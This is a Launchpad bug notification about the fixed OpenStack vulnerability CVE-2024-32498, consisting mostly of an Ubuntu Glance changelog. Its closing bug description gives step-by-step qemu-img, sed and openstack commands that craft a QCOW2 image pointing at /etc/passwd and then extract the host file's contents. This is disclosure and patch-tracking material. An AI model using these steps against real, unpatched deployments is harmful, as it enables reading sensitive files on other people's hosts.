[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
James Page
2059809 at bugs.launchpad.net
Mon Jul 8 13:06:11 UTC 2024
This bug was fixed in the package glance - 2:24.2.1-0ubuntu1.2~cloud0
---------------
glance (2:24.2.1-0ubuntu1.2~cloud0) focal; urgency=medium
.
* SECURITY UPDATE for Ubuntu Cloud Archive. backport to focal.
.
glance (2:24.2.1-0ubuntu1.2) jammy-security; urgency=medium
.
* SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
(LP: #2059809)
- debian/patches/CVE-2024-32498-pre1.patch: limit CaptureRegion sizes
in format_inspector for VMDK and VHDX.
- debian/patches/CVE-2024-32498-pre2.patch: support Stream Optimized
VMDKs.
- debian/patches/CVE-2024-32498-1.patch: reject qcow files with
data-file attributes.
- debian/patches/CVE-2024-32498-2.patch: extend format_inspector for
QCOW safety.
- debian/patches/CVE-2024-32498-3.patch: add VMDK safety check.
- debian/patches/CVE-2024-32498-4.patch: reject unsafe qcow and vmdk
files.
- debian/patches/CVE-2024-32498-5.patch: add QED format detection to
format_inspector.
- debian/patches/CVE-2024-32498-6.patch: add file format detection to
format_inspector.
- debian/patches/CVE-2024-32498-7.patch: add safety check and detection
support to FI tool.
- CVE-2024-32498
.
glance (2:24.2.1-0ubuntu1) jammy; urgency=medium
.
* New stable point release for OpenStack Yoga (LP: #2037332).
.
glance (2:24.2.0-0ubuntu1) jammy; urgency=medium
.
* New stable point release for OpenStack Yoga (LP: #2011713).
* d/p/CVE-2022-47951.patch: Dropped. Fixed in stable point release.
.
glance (2:24.1.0-0ubuntu1.1) jammy-security; urgency=medium
.
* SECURITY UPDATE: Arbitrary file access
- debian/patches/CVE-2022-47951.patch: Enforce image safety
during image_conversion.
- CVE-2022-47951
.
glance (2:24.1.0-0ubuntu1) jammy; urgency=medium
.
* d/gbp.conf: Create stable/yoga branch.
* New stable point release for OpenStack Yoga (LP: #1980369).
.
glance (2:24.0.0-0ubuntu1) jammy; urgency=medium
.
* d/watch: Scope to 24.x.
* New upstream release for OpenStack Yoga.
.
glance (2:24.0.0~rc1+git2022030311.d4119be05-0ubuntu1) jammy; urgency=medium
.
* New upstream snapshot for OpenStack Yoga.
* d/control: Align (Build-)Depends with upstream.
* d/p/skip-py10-failure.patch: Dropped. Fixed in upstream snapshot.
.
glance (2:23.0.0+git2022011216.502fa0ffc-0ubuntu1) jammy; urgency=medium
.
* d/glance-common.install, d/glance-api.init.in: Install
glance-image-import.conf.sample and add --config-dir=/etc/glance/
to glance-api init script (LP: #1955022).
* New upstream snapshot for OpenStack Yoga.
* d/control, d/rules: Bump debhelper compat to 13.
.
glance (2:23.0.0+git2021120811.4ee7799aa-0ubuntu1) jammy; urgency=medium
.
* New upstream snapshot for OpenStack Yoga.
* d/p/skip-py10-failure.patch: Skip test that is raising different
exception with Python 3.10.
.
glance (2:23.0.0-0ubuntu1) impish; urgency=medium
.
* d/watch: Scope to 23.x.
* New upstream release for OpenStack Xena.
* d/control: Align (Build-)Depends with upstream.
.
glance (2:23.0.0~b3+git2021091316.d49eaa04c-0ubuntu1) impish; urgency=medium
.
* New upstream snapshot for OpenStack Xena.
* d/p/add-root-tar-support.patch: Rebased.
.
glance (2:23.0.0~b2+git2021072116.62334aa4-0ubuntu1) impish; urgency=medium
.
* New upstream snapshot for OpenStack Xena.
* d/control: Align (Build-)Depends with upstream.
.
glance (2:22.0.0+git2021061112.4f20e500-0ubuntu1) impish; urgency=medium
.
* New upstream snapshot for OpenStack Xena.
.
glance (2:22.0.0-0ubuntu1) hirsute; urgency=medium
.
* New upstream release for OpenStack Wallaby.
.
glance (2:22.0.0~rc1-0ubuntu1) hirsute; urgency=medium
.
* d/watch: Track the 22.x series and fix path.
* New upstream release candidate for OpenStack Wallaby.
* d/control: Align (Build-)Depends with upstream.
.
glance (2:22.0.0~b2+git2021012915.03bf00ee-0ubuntu1) hirsute; urgency=medium
.
* New upstream snapshot for OpenStack Wallaby.
* d/control: Align (Build-)Depends with upstream.
.
glance (2:21.0.0+git2020120911.f102b74a-0ubuntu1) hirsute; urgency=medium
.
* New upstream snapshot for OpenStack Wallaby.
.
glance (2:21.0.0-0ubuntu1) groovy; urgency=medium
.
* d/control: Update VCS paths for move to lp:~ubuntu-openstack-dev.
* d/watch: Track the 21.x series.
* New upstream release for OpenStack Victoria.
.
glance (2:21.0.0~b3~git2020091515.e16d5c9b-0ubuntu1) groovy; urgency=medium
.
[ Chris MacNaughton ]
* d/control: Remove Breaks/Replaces that are older than Focal (LP: #1878419).
.
[ Corey Bryant ]
* New upstream snapshot for OpenStack Victoria.
* d/control: Align (Build-)Depends with upstream.
.
glance (2:21.0.0~b2~git2020073013.cfbe5f76-0ubuntu2) groovy; urgency=medium
.
* d/glance-common.postrm: Drop --system from deluser/delgroup calls. This
aligns with the glance-common.postinst script reserved glance uid/gid
(LP: #1889846).
.
glance (2:21.0.0~b2~git2020073013.cfbe5f76-0ubuntu1) groovy; urgency=medium
.
* New upstream snapshot for OpenStack Victoria.
* Align (Build-)Depends with upstream.
.
glance (2:21.0.0~b1~git2020062909.e6db0b10-0ubuntu1) groovy; urgency=medium
.
* New upstream snapshot for OpenStack Victoria.
* Align (Build-)Depends with upstream.
* d/glance-common.install, d/glance-common.manpages: Remove glance-registry bits
after upstream removal.
* d/control: Update Standards-Version to 4.5.0.
--
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809
Title:
[OSSA-2024-001] Arbitrary file access through QCOW2 external data file
(CVE-2024-32498)
Status in Cinder:
Fix Released
Status in Ubuntu Cloud Archive:
Fix Released
Status in Ubuntu Cloud Archive antelope series:
Fix Released
Status in Ubuntu Cloud Archive bobcat series:
Fix Released
Status in Ubuntu Cloud Archive caracal series:
Fix Released
Status in Ubuntu Cloud Archive ussuri series:
Fix Committed
Status in Ubuntu Cloud Archive yoga series:
Fix Released
Status in Glance:
Fix Released
Status in OpenStack Compute (nova):
Fix Released
Status in OpenStack Security Advisory:
Fix Released
Bug description:
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.
To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions
More information about the Ubuntu-openstack-bugs
mailing list